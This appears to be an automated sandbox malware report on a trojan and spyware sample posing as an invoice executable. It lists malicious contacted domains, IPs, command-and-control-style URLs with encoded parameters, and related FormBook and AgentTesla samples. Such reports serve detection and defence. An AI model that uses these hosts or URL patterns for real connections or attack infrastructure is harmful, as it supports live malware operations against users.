            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.omexai.info/45sz/?lL2=1ZRtX&KxdLgNi=wkQ2jmS8yMxgRlKUPxXZOSJfy276TIgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x/tSYSMAamA14mf1kJ7jyRRC6WiyMsI3Xnv4BkXKynB7mMQ==0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz/gxi9/0%Avira URL Cloudsafe
            http://www.clientebradesco.online/xsf1/?KxdLgNi=/2dxOCr9e8Tu47VkPNo5dAI1prtgpWpDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaHQ9FJ0pFhf/XXW3oapof9+b9s/jcWq68S+C05ai3yP+Fag==&lL2=1ZRtX0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725002238.0041500934&other_args=eyJ1cmkiOiAiL0%Avira URL Cloudsafe
            http://www.aflaksokna.com/ifo8/0%Avira URL Cloudsafe
            http://www.dfbio.net/yzen/0%Avira URL Cloudsafe
            http://www.healthsolutions.top/cent/0%Avira URL Cloudsafe
            http://www70.clientebradesco.online/0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz/gxi9/?lL2=1ZRtX&KxdLgNi=Ur1yZ7cx/WDhKbJVMH1InawKNi3bU8kDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGka4if3ZKlzYFZx3st7o0oN1uEWmnrbWQQ6vJ4evJTffgTg==0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.asian-massage-us.xyz/kc69/0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.asian-massage-us.xyz/kc69/?KxdLgNi=NmpF3EhDDWuD2jt+k/g095xLRHRyuzqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGNcTC3e2/WFeQ1r1lf08AeSNxqtZfuNHfso7Fe4LFqfY2Mw==&lL2=1ZRtX0%Avira URL Cloudsafe
            http://www.fineg.online/mkan/0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            http://www.myim.cloud/12ts/?KxdLgNi=fK0TrVkIcECrXBt/QBT8PCmrckdVeV1vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKO78C1JBbT4+4k1+SvQMP+iwoSoAbGtJFITlm6yZl6HBNXw==&lL2=1ZRtX0%Avira URL Cloudsafe
            http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?KxdLgNi=2UIJc9LRnkw4J/ss8vEg5cKBRK5CPFs/WFWPir8W0%Avira URL Cloudsafe
            http://www.myim.cloud/12ts/0%Avira URL Cloudsafe
            http://www.aflaksokna.com/ifo8/?KxdLgNi=2UIJc9LRnkw4J/ss8vEg5cKBRK5CPFs/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ag+qKGzHHtle7TmqA+4Kpt5MpPo1VtzF+jhQD474obZk+SA==&lL2=1ZRtX0%Avira URL Cloudsafe
            http://www.d55dg.top/ftud/?KxdLgNi=CQmIz2bNYdnQtzE5dRZx19O+RKFjtfDUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bAk6hJ8rVDO8n3CpjeInC2PpnYB4d910sD/0oMC4edJRzog==&lL2=1ZRtX0%Avira URL Cloudsafe
            http://www.d55dg.top/ftud/0%Avira URL Cloudsafe
            http://www.omexai.info/45sz/0%Avira URL Cloudsafe
            http://www.dfbio.net:80/yzen/?KxdLgNi=O9V9WpJA2Id3CQ8RbCyxNyy8YHr0%Avira URL Cloudsafe
            http://www.golbasi-nakliyat.xyz0%Avira URL Cloudsafe
            http://www.qiluqiyuan.buzz/p6o9/0%Avira URL Cloudsafe
            http://www.dfbio.net/yzen/?KxdLgNi=O9V9WpJA2Id3CQ8RbCyxNyy8YHr+x7luQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY4bjGHbWiFISykJbmA24D38d4U9gmj0KuNkWrH/Oj7BpqHw==&lL2=1ZRtX0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.clientebradesco.online
            		45.33.23.183
            		truefalse
              		unknown
              aflaksokna.com
              		5.144.130.52
              		truetrueunknown
              d55dg.top
              		154.23.184.240
              		truetrueunknown
              www.healthsolutions.top
              		13.248.169.48
              		truetrueunknown
              www.asian-massage-us.xyz
              		199.59.243.226
              		truetrue
                		unknown
                www.qiluqiyuan.buzz
                		161.97.168.245
                		truetrue
                  		unknown
                  www.dfbio.net
                  		218.247.68.184
                  		truetrue
                    		unknown
                    www.fineg.online
                    		162.0.239.141
                    		truetrue
                      		unknown
                      omexai.info
                      		3.33.130.190
                      		truetrueunknown
                      natroredirect.natrocdn.com
                      		85.159.66.93
                      		truetrueunknown
                      www.myim.cloud
                      		199.59.243.226
                      		truetrueunknown
                      www.golbasi-nakliyat.xyz
                      		unknown
                      		unknowntrue
                        		unknown
                        www.omexai.info
                        		unknown
                        		unknowntrueunknown
                        www.esistiliya.online
                        		unknown
                        		unknowntrue
                          		unknown
                          www.d55dg.top
                          		unknown
                          		unknowntrueunknown
                          www.aflaksokna.com
                          		unknown
                          		unknowntrueunknown
                          www.950021.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.arlon-commerce.com
                            		unknown
                            		unknowntrueunknown
                            www.thriveline.online
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.golbasi-nakliyat.xyz/gxi9/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.clientebradesco.online/xsf1/?KxdLgNi=/2dxOCr9e8Tu47VkPNo5dAI1prtgpWpDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaHQ9FJ0pFhf/XXW3oapof9+b9s/jcWq68S+C05ai3yP+Fag==&lL2=1ZRtXfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.omexai.info/45sz/?lL2=1ZRtX&KxdLgNi=wkQ2jmS8yMxgRlKUPxXZOSJfy276TIgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x/tSYSMAamA14mf1kJ7jyRRC6WiyMsI3Xnv4BkXKynB7mMQ==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.aflaksokna.com/ifo8/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.dfbio.net/yzen/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.healthsolutions.top/cent/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.golbasi-nakliyat.xyz/gxi9/?lL2=1ZRtX&KxdLgNi=Ur1yZ7cx/WDhKbJVMH1InawKNi3bU8kDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGka4if3ZKlzYFZx3st7o0oN1uEWmnrbWQQ6vJ4evJTffgTg==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.asian-massage-us.xyz/kc69/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.asian-massage-us.xyz/kc69/?KxdLgNi=NmpF3EhDDWuD2jt+k/g095xLRHRyuzqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGNcTC3e2/WFeQ1r1lf08AeSNxqtZfuNHfso7Fe4LFqfY2Mw==&lL2=1ZRtXtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fineg.online/mkan/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.myim.cloud/12ts/?KxdLgNi=fK0TrVkIcECrXBt/QBT8PCmrckdVeV1vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKO78C1JBbT4+4k1+SvQMP+iwoSoAbGtJFITlm6yZl6HBNXw==&lL2=1ZRtXtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.myim.cloud/12ts/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.aflaksokna.com/ifo8/?KxdLgNi=2UIJc9LRnkw4J/ss8vEg5cKBRK5CPFs/WFWPir8WYxJAH+6g3fgbQ7tbeiY6criSjvcvowcgMck3cAUpTS0Ag+qKGzHHtle7TmqA+4Kpt5MpPo1VtzF+jhQD474obZk+SA==&lL2=1ZRtXtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.d55dg.top/ftud/?KxdLgNi=CQmIz2bNYdnQtzE5dRZx19O+RKFjtfDUuZcFlqzFgfI5jfpPm1EP0eBYxBqCjdR2XMjWQLlFnnRrMqX4rM3bAk6hJ8rVDO8n3CpjeInC2PpnYB4d910sD/0oMC4edJRzog==&lL2=1ZRtXtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.d55dg.top/ftud/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.omexai.info/45sz/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.qiluqiyuan.buzz/p6o9/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.dfbio.net/yzen/?KxdLgNi=O9V9WpJA2Id3CQ8RbCyxNyy8YHr+x7luQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY4bjGHbWiFISykJbmA24D38d4U9gmj0KuNkWrH/Oj7BpqHw==&lL2=1ZRtXtrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabchkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icochkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725002238.0041500934&other_args=eyJ1cmkiOiAiLchkntfs.exe, 00000005.00000002.4506411115.0000000005184000.00000004.10000000.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.0000000002B44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690302311.000000002A7E4000.00000004.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.ecosia.org/newtab/chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www70.clientebradesco.online/firefox.exe, 00000008.00000002.2690302311.000000002A7E4000.00000004.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ac.ecosia.org/autocomplete?q=chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.google.comchkntfs.exe, 00000005.00000002.4506411115.0000000005316000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4508445951.0000000007730000.00000004.00000800.00020000.00000000.sdmp, chkntfs.exe, 00000005.00000002.4506411115.000000000595E000.00000004.10000000.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.000000000331E000.00000004.00000001.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.0000000002CD6000.00000004.00000001.00040000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?KxdLgNi=2UIJc9LRnkw4J/ss8vEg5cKBRK5CPFs/WFWPir8Wchkntfs.exe, 00000005.00000002.4506411115.0000000005C82000.00000004.10000000.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.0000000003642000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchchkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.dfbio.net:80/yzen/?KxdLgNi=O9V9WpJA2Id3CQ8RbCyxNyy8YHrchkntfs.exe, 00000005.00000002.4506411115.00000000062CA000.00000004.10000000.00040000.00000000.sdmp, umoPQplhJOFey.exe, 00000006.00000002.4505828352.0000000003C8A000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.golbasi-nakliyat.xyzumoPQplhJOFey.exe, 00000006.00000002.4507474267.0000000004C1A000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=chkntfs.exe, 00000005.00000003.2584514369.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              5.144.130.52
                              		aflaksokna.comIran (ISLAMIC Republic Of)
                              		59441HOSTIRAN-NETWORKIRtrue
                              13.248.169.48
                              		www.healthsolutions.topUnited States
                              		16509AMAZON-02UStrue
                              45.33.23.183
                              		www.clientebradesco.onlineUnited States
                              		63949LINODE-APLinodeLLCUSfalse
                              162.0.239.141
                              		www.fineg.onlineCanada
                              		22612NAMECHEAP-NETUStrue
                              218.247.68.184
                              		www.dfbio.netChina
                              		139021WEST263GO-HKWest263InternationalLimitedHKtrue
                              199.59.243.226
                              		www.asian-massage-us.xyzUnited States
                              		395082BODIS-NJUStrue
                              154.23.184.240
                              		d55dg.topUnited States
                              		174COGENT-174UStrue
                              3.33.130.190
                              		omexai.infoUnited States
                              		8987AMAZONEXPANSIONGBtrue
                              85.159.66.93
                              		natroredirect.natrocdn.comTurkey
                              		34619CIZGITRtrue
                              161.97.168.245
                              		www.qiluqiyuan.buzzUnited States
                              		51167CONTABODEtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1501645
                              Start date and time:2024-08-30 09:15:38 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 58s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:INV20240828.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/5@16/10
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
                              • Successful, ratio: 86%
                              • Number of executed functions: 14
                              • Number of non-executed functions: 323
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 92.204.80.11
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, whois-unverified.domainbox.akadns.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              03:17:41API Interceptor10074976x Sleep call for process: chkntfs.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              13.248.169.48COM404 PDF.exeGet hashmaliciousFormBookBrowse
                              • www.opentelemetry.shop/he2a/?9r9Hc=ivWl&NtxTwXO=KCPTlsMcF8eqeRPoupc8NSnF5ATV37tgrRW1pEzwOBbcxu+G1NpS7ZYtf9ZA4e+ZQi383eqNlg==
                              quotation.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                              • www.somon.app/jys5/?pbM=rVxTT&lz=Gv2FWEuKupcxnbQ0F3wuClB9GaJm+HhnnRk0N+Y5EGHs9JmWyVRozS4hAZOY3TSoZ8xeM4DSbtugb4BFcxOd14Bplzi5QjmPlStqozPHXjG7lc9y/dalULA=
                              rRFQ.bat.exeGet hashmaliciousFormBookBrowse
                              • www.study-in-nyc.online/elaa/
                              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.dyme.tech/pjne/
                              COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                              • www.eworld.org/74ki/
                              Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                              • www.healthsolutions.top/p2w8/
                              DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                              • www.dyme.tech/bduc/
                              Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                              • pupydeq.com/login.php
                              roundwood.exeGet hashmaliciousSimda StealerBrowse
                              • pupydeq.com/login.php
                              PI#220824.exeGet hashmaliciousFormBookBrowse
                              • www.magicface.shop/4rft/
                              45.33.23.183http://bestfreinds.orgGet hashmaliciousUnknownBrowse
                              • bestfreinds.org/?gp=1&js=1&uuid=1721836479.0010688878&other_args=eyJ1cmkiOiAiLyIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0=
                              MAWB# 695-47123101 - PN1 MOL MAESTRO V-073E..scr.exeGet hashmaliciousFormBookBrowse
                              • www.optime19.com/seij/
                              https://www.bermudaemissions.comGet hashmaliciousUnknownBrowse
                              • www.bermudaemissions.com/?gp=1&js=1&uuid=1710854117.0046101427&other_args=eyJ1cmkiOiAiLyIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0=
                              iW3QlUK3wG.exeGet hashmaliciousFormBookBrowse
                              • www.optime19.com/ppr3/?GrP8=3FrCU9nWcef8t1z2reILGDWuibQO49BtowcN6mi1M/CMStVRZANtvxp/VMzeQaf2D1+Xz+yZWuiPTpwAdSvcKWAJYIJxcd9KOkXtNn+jmu1j&3bS=88epahP0J
                              g3oSC9Fd6K.exeGet hashmaliciousFormBook, zgRATBrowse
                              • www.monoploygo.wiki/nb9a/?5p0=ByCwUpD9bW9YeruFfDtfWiQHGhkU525dS8hxjYvE8iM9cGFGcS6DBRANF64JDNmh+gWjFxCc+FX/QH31VJrIrM7Y1vRtO6NywhIzETJJMldn&Fzm=B6XxthNXiX
                              vUsaFL3sWj.exeGet hashmaliciousFormBookBrowse
                              • www.optime19.com/ppr3/?yHr=3FrCU9nWcef8t1z2reILGDWuibQO49BtowcN6mi1M/CMStVRZANtvxp/VMzeQaf2D1+Xz+yZWuiPTpwAdSvcKUEuFOd0d4pGO0XtNjWyrO1j&3B3=QJfhe
                              SSLTD.xlsGet hashmaliciousFormBookBrowse
                              • www.monoploygo.wiki/o868/?MtV=KvXpxj&FXW0=F8LWZRW+KevRO4R4NsX7RJ/KnVJqviYtvWrEUTU329ihQhZTVsgfiMMz/tRc/JZ9cwey/vn6P8HEtHvY12zVuYp6DV3+2n1cr6KQ0as=
                              U6SJBLxT2Z.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.alwayswim.com/fbkg/?Nx1L1=526dgl_phJ&T6I=NPALKBz6tnWwrGvL1qkXou5DT6PdsmzVmJQ0dMJxOdiepQUGM57E+42rms1x66Gf0nUj851MdR/onhYOJHuQNwzuR569J9mC8A==
                              4eX3EdJ8Q9.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • www.franchisevideography.com/6vse/?HlodUVz=MP4aJTqYC4vQMBtENwlhfMq8DEkCA6FU41CifmM7zlVilMBpP7k0fJAVYKZLDpHGK+bW65bO27W9Q0vaj6/TZG0ALnN1iW9mqQ==&Uq=lH4Upojb6Awq
                              http://dummy.org/Get hashmaliciousUnknownBrowse
                              • dummy.org/?gp=1&js=1&uuid=1695044120.0014040204&other_args=eyJ1cmkiOiAiLyIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0=

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              www.qiluqiyuan.buzzAIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                              • 161.97.168.245
                              PO#4510065525.exeGet hashmaliciousFormBookBrowse
                              • 161.97.168.245
                              www.healthsolutions.topQuotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                              • 13.248.169.48
                              www.dfbio.netrRFQ.bat.exeGet hashmaliciousFormBookBrowse
                              • 218.247.68.184
                              natroredirect.natrocdn.comSecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                              • 85.159.66.93
                              REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 85.159.66.93
                              IMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              • 85.159.66.93
                              New_Order_Big_Bag_PDF.exeGet hashmaliciousFormBookBrowse
                              • 85.159.66.93
                              350.xlsGet hashmaliciousFormBookBrowse
                              • 85.159.66.93
                              Quotation-27-08-24.exeGet hashmaliciousFormBookBrowse
                              • 85.159.66.93
                              #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 85.159.66.93
                              AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                              • 85.159.66.93
                              PO#4510065525.exeGet hashmaliciousFormBookBrowse
                              • 85.159.66.93
                              RFQ# 2200002827.exeGet hashmaliciousFormBookBrowse
                              • 85.159.66.93

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              LINODE-APLinodeLLCUShttps://uaj.sa/api/aHR0cHM6Ly9nb29nbGUuY29t&sig=ZDUxNjU0ZTllNzZkYTAxNWE4OTNkZTAyM2ZkZDA1MGViMGIzY2UyOTU1MzY1NGMyNjFlOTExM2ZiMzA5MzdmMg&exp=MTcyNDIzOTUzMQGet hashmaliciousHTMLPhisherBrowse
                              • 198.58.106.173
                              Paul Agrotis List.xlsGet hashmaliciousFormBookBrowse
                              • 45.33.6.223
                              https://set.page/cdtautomotive/Get hashmaliciousUnknownBrowse
                              • 198.58.106.125
                              SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsxGet hashmaliciousFormBookBrowse
                              • 45.33.6.223
                              https://www.ispringsolutions.com/Get hashmaliciousHTMLPhisherBrowse
                              • 172.104.226.213
                              350.xlsGet hashmaliciousFormBookBrowse
                              • 45.33.6.223
                              https://secure-validation.tiiny.site/#info@magmutual.comGet hashmaliciousUnknownBrowse
                              • 172.104.231.58
                              #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                              • 96.126.123.244
                              bat.batGet hashmaliciousAsyncRAT, DcRat, PureLog Stealer, XWorm, zgRATBrowse
                              • 172.105.248.11
                              SecuriteInfo.com.FileRepMalware.24169.25475.exeGet hashmaliciousUnknownBrowse
                              • 45.79.196.203
                              HOSTIRAN-NETWORKIRPayment-Details.scr.exeGet hashmaliciousAgentTeslaBrowse
                              • 5.144.130.41
                              rDHL_PT563857935689275783656385FV-GDS3535353.batGet hashmaliciousFormBook, GuLoaderBrowse
                              • 185.83.114.124
                              rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                              • 185.83.114.124
                              Shipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 5.144.130.49
                              PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 5.144.130.49
                              PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 5.144.130.49
                              PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 5.144.130.35
                              Overdue Account.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 5.144.130.35
                              https://hamrahansystem.com/4xe3cx/?PliaTEYmfRshGet hashmaliciousUnknownBrowse
                              • 45.138.134.33
                              Saham_Man.apkGet hashmaliciousIRATABrowse
                              • 5.144.130.58
                              AMAZON-02USCOM404 PDF.exeGet hashmaliciousFormBookBrowse
                              • 13.248.169.48
                              UnmxRI.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                              • 52.9.242.57
                              sora.m68k.elfGet hashmaliciousMiraiBrowse
                              • 35.154.242.253
                              sora.mips.elfGet hashmaliciousMiraiBrowse
                              • 54.97.170.243
                              https://eu-central-1.protection.sophos.com/?d=manychat.com&u=aHR0cHM6Ly9teS5tYW55Y2hhdC5jb20vcj9hY3Q9YjFkMWQwZDkyMDBkMzg2OGQxODUzY2NhYTk0Y2MxYmQmdT03ODg3NjgyNjIxMzQyNDMwJnA9MTAzMTAzNDUyNjg5OTI1Jmg9YTM4ZGRlMzNiMCZmYmNsaWQ9SXdaWGgwYmdOaFpXMENNVEFBQVIyNTVGWGl1MGk2VnFpR29zYktwampSVVgxQllIR2VXMjIzY0VsdzhQV1JxQkljdzFwOEtxQ3QydHNfYWVtX3djeUE3ZklHUmc5anZ3elZEVUZnc1E=&p=m&i=NjM1OGY5Yjk1Yzc0NzYwZmVkZjg4ODBh&t=UnJja2pSclhrTCtBamxpVW5SbExkeEY5Y3JMRXJReFA1MHNjMk83N01UTT0=&h=ac3121ecdd334a8eb27b9efa20223e6a&s=AVNPUEhUT0NFTkNSWVBUSVYt5nkMY7lrXten-tMtQEoHjKHanPDgFGYEyZWMpkBETxK29AsSDujuoNOgxyOGay3pj-cHDVi7N9Bi-dbvWmnMoslvZEuKFbMo_q4CIRO7yQGet hashmaliciousUnknownBrowse
                              • 3.161.82.129
                              gHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
                              • 76.76.21.123
                              sora.ppc.elfGet hashmaliciousUnknownBrowse
                              • 44.224.113.100
                              sora.arm.elfGet hashmaliciousMiraiBrowse
                              • 13.251.32.76
                              kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
                              • 76.76.21.241
                              https://www.dropbox.com/scl/fi/op070xas0eh2p222upauu/Document-1.docx?rlkey=lrjcxds4fso3d5dmmlv1itair&st=c1fl3n2k&dl=0Get hashmaliciousHTMLPhisherBrowse
                              • 35.157.212.223

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\Esher

                              Download File
                              Process:C:\Users\user\Desktop\INV20240828.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):86022
                              Entropy (8bit):4.179158936063348
                              Encrypted:false
